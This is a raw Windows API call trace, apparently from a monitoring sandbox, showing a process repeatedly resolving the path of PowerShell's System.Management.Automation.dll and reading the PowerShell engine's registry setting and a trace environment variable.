	[0230.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.517] GetCurrentProcessId () returned 0x568
	[0230.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.521] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d588 | out: phkResult=0x18d588*=0x36c) returned 0x0
	[0230.522] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d50c, lpData=0x0, lpcbData=0x18d508*=0x0 | out: lpType=0x18d50c*=0x1, lpData=0x0, lpcbData=0x18d508*=0x56) returned 0x0
	[0230.522] CoTaskMemAlloc (cb=0x5a) returned 0x1b916c80
	[0230.522] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d4dc, lpData=0x1b916c80, lpcbData=0x18d4d8*=0x56 | out: lpType=0x18d4dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d4d8*=0x56) returned 0x0
	[0230.522] CoTaskMemFree (pv=0x1b916c80) 
	[0230.522] RegCloseKey (hKey=0x36c) returned 0x0
	[0230.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.538] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0230.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
